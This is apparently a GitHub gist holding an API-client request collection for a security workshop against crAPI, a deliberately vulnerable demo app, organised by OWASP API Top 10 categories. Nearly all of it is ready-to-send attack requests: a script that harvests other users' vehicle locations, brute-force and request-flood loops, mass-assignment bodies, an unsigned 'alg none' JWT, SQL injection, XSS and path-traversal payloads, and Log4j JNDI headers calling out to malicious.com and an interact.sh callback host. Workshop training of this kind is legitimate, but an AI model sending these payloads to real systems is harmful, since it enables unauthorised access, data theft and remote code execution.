Skip to content

Instantly share code, notes, and snippets.

@mikeacjones

mikeacjones/workshop-collections

Last active April 27, 2024 14:36
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save mikeacjones/7ed2dda1f2f23dfe21f2386d77dba57c to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save mikeacjones/7ed2dda1f2f23dfe21f2386d77dba57c to your computer and use it in GitHub Desktop.
Download ZIP
Raw
workshop-collections
[
{
"v": 2,
"name": "00 - Sign Ups",
"folders": [],
"requests": [
{
"v": "4",
"name": "Login",
"endpoint": "<<crapi-web>>/identity/api/auth/login",
"method": "POST",
"headers": [
{
"key": "Content-Type",
"value": "application/json",
"active": true
}
],
"params": [],
"auth": {
"authType": "none",
"authActive": true
},
"body": {
"contentType": "application/json",
"body": "{\n \"email\": \"<<crapi_email>>\",\n \"password\": \"<<crapi_password>>\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": "const body = pw.response.body\npw.env.set(\"token\", body.token)"
},
{
"v": "4",
"name": "Create Post",
"endpoint": "<<crapi-web>>/community/api/v2/community/posts",
"method": "POST",
"headers": [],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"content\": \"This is my POST\",\n \"title\": \"My New Post\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
},
{
"v": "4",
"name": "Ask OTP",
"endpoint": "<<crapi-web>>/identity/api/auth/forget-password",
"method": "POST",
"headers": [],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\"email\": \"[email protected]\"}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
}
],
"auth": {
"authType": "inherit",
"authActive": true
},
"headers": []
},
{
"v": 2,
"name": "API01:2019 Broken Object Level Authorization",
"folders": [],
"requests": [
{
"v": "4",
"name": "Fetch All Vehicle Locations",
"endpoint": "<<crapi-web>>/community/api/v2/community/posts/recent",
"method": "GET",
"headers": [
{
"key": "Authorization",
"value": "Bearer <<token>>",
"active": true
}
],
"params": [],
"auth": {
"authType": "none",
"authActive": true
},
"body": {
"contentType": null,
"body": null
},
"requestVariables": [],
"preRequestScript": "",
"testScript": "const posts = pw.response.body\nconst host = pw.env.get(\"crapi-web\")\nconst token = pw.env.get(\"token\")\n\nconst fetchLocation = (vehicleid) => {\n fetch(\n `${host}/identity/api/v2/vehicle/${vehicleid}/location`, \n { \n headers: { \n Authorization: `Bearer ${token}`\n }\n }\n )\n}\n\nposts.forEach(post => {\n if (post.author.vehicleid) {\n fetchLocation(post.author.vehicleid)\n }\n if (post.comments) {\n post.comments.forEach(comment => {\n if (comment.author.vehicleid) {\n fetchLocation(comment.author.vehicleid)\n }\n })\n }\n\n})\npw.env.set(\"vehicleIds\", JSON.stringify(vehicleids))"
}
],
"auth": {
"authType": "inherit",
"authActive": true
},
"headers": []
},
{
"v": 2,
"name": "API02:2019 Broken User Authentication",
"folders": [],
"requests": [
{
"v": "4",
"name": "Broken Verification of Expired JWT Token",
"endpoint": "<<crapi-web>>/workshop/api/mechanic/mechanic_report",
"method": "GET",
"headers": [],
"params": [
{
"key": "report_id",
"value": "<<report_id>>",
"active": true
}
],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<badToken>>"
},
"body": {
"contentType": null,
"body": null
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
},
{
"v": "4",
"name": "Broken Authentication",
"endpoint": "<<crapi-web>>/workshop/api/mechanic/mechanic_report",
"method": "GET",
"headers": [],
"params": [
{
"key": "report_id",
"value": "<<report_id>>",
"active": true
}
],
"auth": {
"authType": "none",
"authActive": true
},
"body": {
"contentType": null,
"body": null
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
}
],
"auth": {
"authType": "inherit",
"authActive": true
},
"headers": []
},
{
"v": 2,
"name": "API04:2019 Lack of Resources & Rate Limiting",
"folders": [],
"requests": [
{
"v": "4",
"name": "Excessive Requests For Non-Existing Resources",
"endpoint": "<<crapi-web>>/identity/api/v2/vehicle/<<randomUUID>>/location",
"method": "GET",
"headers": [],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"content\": \"My car is broken\",\n \"title\": \"hello world\"\n}"
},
"requestVariables": [],
"preRequestScript": "const host = pw.env.get(\"crapi-web\")\nconst token = pw.env.get(\"token\")\nconst uuidv4 = () => {\n return \"10000000-1000-4000-8000-100000000000\".replace(/[018]/g, c =>\n (+c ^ crypto.getRandomValues(new Uint8Array(1))[0] & 15 >> +c / 4).toString(16)\n )\n}\n\nconst fetch404 = () => {\n fetch(\n `${host}/identity/api/v2/vehicle/${uuidv4()}/location`,\n {\n headers: {\n Authorization: `Bearer ${token}`\n }\n }\n )\n}\n\nconst iterations = pw.env.get(\"brute_force_count\")\nfor (var i = 0; i < iterations; i++) {\n fetch404()\n}",
"testScript": ""
},
{
"v": "4",
"name": "Brute Force",
"endpoint": "<<crapi-web>>/identity/api/auth/login",
"method": "POST",
"headers": [],
"params": [],
"auth": {
"authType": "none",
"authActive": true
},
"body": {
"contentType": "application/json",
"body": "{\"email\": \"<<$randomEmail>>\", \"password\": \"<<$randomPassword>>\"}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
}
],
"auth": {
"authType": "inherit",
"authActive": true
},
"headers": []
},
{
"v": 2,
"name": "API05:2019 Broken Function Level Authorization",
"folders": [],
"requests": [
{
"v": "4",
"name": "Unexpected Request Field",
"endpoint": "<<crapi-web>>/workshop/api/shop/orders",
"method": "POST",
"headers": [],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"product_id\": 1,\n \"quantity\": -1,\n \"is_admin\": true\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
},
{
"v": "4",
"name": "Range Violation",
"endpoint": "<<crapi-web>>/workshop/api/shop/orders",
"method": "POST",
"headers": [],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"product_id\": 1,\n \"quantity\": -10000000\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
}
],
"auth": {
"authType": "inherit",
"authActive": true
},
"headers": []
},
{
"v": 2,
"name": "API07:2019 Security Misconfiguration",
"folders": [],
"requests": [
{
"v": "4",
"name": "Server-Side Request Forgery Variation 2",
"endpoint": "<<crapi-web>>/workshop/api/merchant/contact_mechanic",
"method": "POST",
"headers": [],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"mechanic_api\": \"http://localhost:8000/workshop/api/mechanic/receive_report\",\n \"mechanic_code\": \"TRAC_JME\",\n \"number_of_repeats\": 1,\n \"problem_details\": \"asd\",\n \"repeat_request_if_failed\": false,\n \"vin\": \"7GEQK70ITIF544515\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
},
{
"v": "4",
"name": "JWT Payload Data Violation",
"endpoint": "<<crapi-web>>/community/api/v2/community/posts",
"method": "POST",
"headers": [],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<badToken>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"content\": \"My car is broken\",\n \"title\": \"hello world\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
}
],
"auth": {
"authType": "inherit",
"authActive": true
},
"headers": []
},
{
"v": 2,
"name": "API08:2019 Injection",
"folders": [],
"requests": [
{
"v": "4",
"name": "JWT Algorithm Manipulation",
"endpoint": "<<crapi-web>>/community/api/v2/community/posts",
"method": "POST",
"headers": [],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "eyJhbGciOiJub25lIn0.eyJzdWIiOiJtYWxpY2lvdXNfZW1haWxfMUBtYWlsLmNvbSIsImlhdCI6MTY0MDYyODgxMSwiZXhwIjoxNzYwNjI4ODExfQ.qna-6H_HG2PKCiU6tc42c_lymEq87WFz57_fSFk909v39x92C_wO_XaFVqttJ4L1OpF5wzrw3D7UoQNi33rc-A"
},
"body": {
"contentType": "application/json",
"body": "{\n \"content\": \"My car is broken\",\n \"title\": \"hello world\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
},
{
"v": "4",
"name": "SQL Injection",
"endpoint": "<<crapi-web>>/community/api/v2/community/posts/<<community_post_id>>/comment",
"method": "POST",
"headers": [],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"content\": \"a' union select 1,2,3 --\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
},
{
"v": "4",
"name": "Cross-Site Scripting",
"endpoint": "<<crapi-web>>/community/api/v2/community/posts/<<community_post_id>>/comment",
"method": "POST",
"headers": [],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"content\": \"</script><svg onload=alert(1)>\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
},
{
"v": "4",
"name": "Path Traversal",
"endpoint": "<<crapi-web>>/workshop/api/mechanic/mechanic_report",
"method": "GET",
"headers": [],
"params": [
{
"key": "report_id",
"value": "1",
"active": true
}
],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"user_image\": \"../../../../\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
}
],
"auth": {
"authType": "inherit",
"authActive": true
},
"headers": []
},
{
"v": 2,
"name": "Log4j JNDI Exploitation 2021",
"folders": [],
"requests": [
{
"v": "4",
"name": "Log4j Variation 1",
"endpoint": "<<crapi-web>>/community/api/v2/community/posts",
"method": "POST",
"headers": [
{
"key": "User-Agent",
"value": "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://malicious.com/poc}",
"active": true
}
],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"content\": \"This is my POST\",\n \"title\": \"My New Post\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
},
{
"v": "4",
"name": "Log4j Variation 2",
"endpoint": "<<crapi-web>>/community/api/v2/community/posts",
"method": "POST",
"headers": [
{
"key": "User-Agent",
"value": "${jndi:ldap://${hostName}.c6s7rhe60tre1mm17i9gcgh86yoyyy6mk.interact.sh/a}",
"active": true
}
],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"content\": \"This is my POST\",\n \"title\": \"My New Post\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
},
{
"v": "4",
"name": "Log4j Variation 3",
"endpoint": "<<crapi-web>>/community/api/v2/community/posts",
"method": "POST",
"headers": [
{
"key": "User-Agent",
"value": "${jndi:ldap://127.0.0.1:1389/ accessAdversaryClass}",
"active": true
}
],
"params": [],
"auth": {
"authType": "bearer",
"authActive": true,
"token": "<<token>>"
},
"body": {
"contentType": "application/json",
"body": "{\n \"content\": \"This is my POST\",\n \"title\": \"My New Post\"\n}"
},
"requestVariables": [],
"preRequestScript": "",
"testScript": ""
}
],
"auth": {
"authType": "inherit",
"authActive": true
},
"headers": []
}
]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment